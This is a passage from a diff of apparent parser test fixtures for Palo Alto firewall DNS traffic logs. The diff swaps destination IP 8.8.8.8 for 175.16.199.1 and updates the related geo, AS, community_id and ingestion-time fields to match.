+ "community_id": "1:YJceH5rZcz1VbKygrm/qccp9Ess="
 }
 },
 "sequence_number": 32091163,
@@ -8551,8 +8632,8 @@
 ],
 "network": {
 "community_id": [
- "1:pe+tF7SEY/Km9LRsrGI4UWHmV8E=",
- "1:DkOVz0BGrlh9OPZZ8+58eugW7gU="
+ "1:w8XnxnTMQAhm5sOtGkm43MuGB1Y=",
+ "1:YJceH5rZcz1VbKygrm/qccp9Ess="
 ],
 "transport": "udp",
 "application": "dns",
@@ -8592,14 +8673,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.941970878Z",
- "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031708500Z",
+ "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -8622,27 +8703,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 206,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -8661,7 +8744,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -8676,7 +8759,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -8698,7 +8781,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:twx1eOqehbazvI0g0nkTeVynrY0=" + "community_id": "1:MaNPtaexrtBDiK1FqZV47sf+niI=" } }, "sequence_number": 32091164, @@ -8718,8 +8801,8 @@ ], "network": { "community_id": [ - "1:qHh6xeCGBZ5pLwaBsFDRVbP5MZU=", - "1:twx1eOqehbazvI0g0nkTeVynrY0=" + "1:t6loEqKMys5Konp+NIaNnuyNaT8=", + "1:MaNPtaexrtBDiK1FqZV47sf+niI=" ], "transport": "udp", "application": "dns", 
@@ -8759,14 +8842,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941974358Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031712800Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -8789,27 +8872,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 169, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -8828,7 +8913,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -8843,7 +8928,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -8865,7 +8950,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:hcgjXpi+ne3QnFDBLeskkVg4V+M=" + "community_id": "1:WD+GaCUhMujDfHSy7AUahHp1vWw=" } }, "sequence_number": 32091165, @@ -8885,8 +8970,8 @@ ], "network": { "community_id": [ - "1:7yZMN4i1Gxii2+FmEtBbvDk3lvA=", - "1:hcgjXpi+ne3QnFDBLeskkVg4V+M=" + "1:IIfOFVIY3zfc25N4A7SFL5AUzm8=", + "1:WD+GaCUhMujDfHSy7AUahHp1vWw=" ], "transport": "udp", "application": "dns", 
@@ -8926,14 +9011,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941977818Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031717800Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -8956,27 +9041,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 132, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -8995,7 +9082,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9010,7 +9097,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9032,7 +9119,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:C91XK45Q10iqwwp4XYM+Wg1Ua8A=" + "community_id": "1:bCQJCkKJt9w1kBS55QCraj9ey+M=" } }, "sequence_number": 32091166, @@ -9052,8 +9139,8 @@ ], "network": { "community_id": [ - "1:0vV/bWp15XA8ntbAvsV9+ktbx6E=", - "1:C91XK45Q10iqwwp4XYM+Wg1Ua8A=" + "1:qPlhIGArJXmoBhQVuxsknAhz2gI=", + "1:bCQJCkKJt9w1kBS55QCraj9ey+M=" ], "transport": "udp", "application": "dns", 
@@ -9093,14 +9180,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941981346Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031722600Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9123,27 +9210,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 127, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -9162,7 +9251,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9177,7 +9266,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9199,7 +9288,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:hsTAFtOdeb7+Ofe152B+9h69mbE=" + "community_id": "1:pCKdrcOhkESfAZbDDUbNx9zHb+E=" } }, "sequence_number": 32091167, @@ -9219,8 +9308,8 @@ ], "network": { "community_id": [ - "1:v2Rn2HMvdhM3B2CXYva9UePt+Og=", - "1:hsTAFtOdeb7+Ofe152B+9h69mbE=" + "1:iZ6cuDEytPuGtD80pU/7es+QhfI=", + "1:pCKdrcOhkESfAZbDDUbNx9zHb+E=" ], "transport": "udp", "application": "dns", 
@@ -9260,14 +9349,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941984830Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031726300Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9290,27 +9379,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 105, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -9329,7 +9420,7 @@ "packets": 1, "ip": "192.168.15.196" }, - "message": "192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9344,7 +9435,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9366,7 +9457,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:htOXUg3QOGd0fpgLjYzQlvRMzUQ=" + "community_id": "1:/QRiz8XrvAKWvL7InyO5YWn7Unw=" } }, "sequence_number": 32091168, @@ -9386,8 +9477,8 @@ ], "network": { "community_id": [ - "1:tO559KwdaAXfBh7HmZSLp9/JUJQ=", - "1:htOXUg3QOGd0fpgLjYzQlvRMzUQ=" + "1:zALUieRh+c7GcKa4k74kugaW5NQ=", + "1:/QRiz8XrvAKWvL7InyO5YWn7Unw=" ], "transport": "udp", "application": "dns", 
@@ -9427,14 +9518,14 @@ ], "ip": [ "192.168.15.196", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941988310Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031730500Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9457,27 +9548,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 172, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -9496,7 +9589,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9511,7 +9604,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9533,7 +9626,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:gHWCOTtilTTqOn7fOKh7zVq45Xw=" + "community_id": "1:uD+W7tTSk79NUi3PpwMi06q1UWI=" } }, "sequence_number": 32091169, @@ -9553,8 +9646,8 @@ ], "network": { "community_id": [ - "1:aMEfJV/f54B1+0RNtWjw49JfNFU=", - "1:gHWCOTtilTTqOn7fOKh7zVq45Xw=" + "1:XeWsMGIbT/x162pVo0NCV89u0gM=", + "1:uD+W7tTSk79NUi3PpwMi06q1UWI=" ], "transport": "udp", "application": "dns", 
@@ -9594,14 +9687,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941991841Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031735800Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9624,27 +9717,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 134, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -9663,7 +9758,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9678,7 +9773,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9700,7 +9795,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:OGDvpe1+4KQfCsxk0I61jm0+DIc=" + "community_id": "1:PTYX9HnjKczQum2EUlGgqrCBONE=" } }, "sequence_number": 32091170, @@ -9720,8 +9815,8 @@ ], "network": { "community_id": [ - "1:WgGQfntwYS3voQPhGfI/qhx0SVk=", - "1:OGDvpe1+4KQfCsxk0I61jm0+DIc=" + "1:45Rl8R/9Ldlq3xqwvMO1f+V8LQA=", + "1:PTYX9HnjKczQum2EUlGgqrCBONE=" ], "transport": "udp", "application": "dns", 
@@ -9761,14 +9856,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941995309Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031739800Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 